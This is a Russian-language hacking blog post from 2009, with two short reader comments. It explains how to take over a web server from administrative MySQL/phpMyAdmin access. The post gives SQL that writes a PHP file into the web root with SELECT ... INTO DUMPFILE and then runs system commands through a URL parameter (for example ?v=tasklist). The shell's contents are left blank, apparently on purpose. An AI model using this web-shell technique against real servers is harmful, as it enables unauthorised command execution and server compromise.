Поиск по этому блогу

7 мая 2009 г.

Взлом сервера через базу данных

/* Всем привет!
Давненько у меня не было времени чего нибудь написать,рассказать,опубликовать ну и т.д. и т.п.
И вот наконец я нашел пару минуток... */

Сегодня расскажу о взломе сервера через базу данных :
{ это не пособие а общее представление о такого рода атаках; }

Предположим что вы имеете доступ к PHPMyAdmin или просто к базе данных какого нибудь сервера - имеется ввиду доступ с администраторскими привилегиями а не просто Guest. // поскольку нам нужно будет создать таблицу
Кстати существует множество эксплоитов под PhpMyAdmin,а также есть особо продвинутые серверы где даже пароля для доступа не надо,сразу получаешь все привилегии......

Вообщем идем в SQL Query и вписываем следующие :

CREATE TABLE qwerty(
stack TEXT
) TYPE=MYISAM;

INSERT INTO qwerty(stack)
VALUES(

); // в этом блоке не большая ошибочка специально....

Дальше нам нужно узнать главную директорию сайта для этого вписываем @@datadir и получаем путь к root directory...
{ путь нужно знать,потому что создать файл запределами этой директории не получится да нам и не надо :); }

Двигаемся дальше...создаем файл на удаленном компьютере используя следующий код :

select * into dumpfile 'путь к главной директории сервера/имя файла.php' from qwerty;

например :

select * into dumpfile 'c:/appserv/www/exp.php' from qwerty;

После успешного создания PHP файла,смело идем на сервер http://имя сервера/имя созданного файла.php?v=пишем команду,например :
http://имя сервера/имя созданного файла.php?v=tasklist

Отсюда я думаю уже будет легче продвигаться к задуманому....

{ статья написанна только в ознакомительных целях;
это не пособие по хаку а просто описание такого рода аттак; }
YuV4iK

2 комментария:

Анонимный комментирует...

Охуенно но трудно!

Tony Darko комментирует...

ёптить.. хых =) каг бы только у единиц "dumpfile" разрешён.

Sociable